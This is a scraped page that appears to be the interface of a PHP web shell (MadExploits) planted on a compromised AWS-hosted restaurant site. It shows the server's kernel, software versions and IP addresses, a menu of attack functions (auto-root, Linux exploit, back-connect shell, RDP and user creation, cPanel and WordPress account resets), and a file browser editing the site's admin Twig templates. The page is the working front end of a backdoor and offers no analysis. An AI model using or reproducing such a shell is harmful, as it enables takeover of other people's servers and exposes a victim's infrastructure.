Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.191.142.102
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
restaurants /
templates /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
business_create.html.twig
7.94
KB
-rw-rw-r--
business_start.html.twig
917
B
-rw-rw-r--
businesses.html.twig
1.37
KB
-rw-rw-r--
index.html.twig
833
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : business_start.html.twig
{% extends 'base2.html.twig' %} {% block content %} <div class="login-form"> <div class="card"> <div class="card-header">Claim Place</div> <div class="card-body"> {# {% if error %} <div id="error">{{ error }}</div> {% endif %} #} <form action="{{ path('claim', {'slug': slug}) }}" method="post" role="form"> <h3>{{ place.name }}</h3> <div class="form-group"> <input type="email" name="email" class="form-control" value="{{ place.owner ?? '' }}" placeholder="Place email"> </div> <input type="submit" name="submit" value="Send Link" class="btn btn-other"> </form> </div> </div> </div> {% endblock %}
Close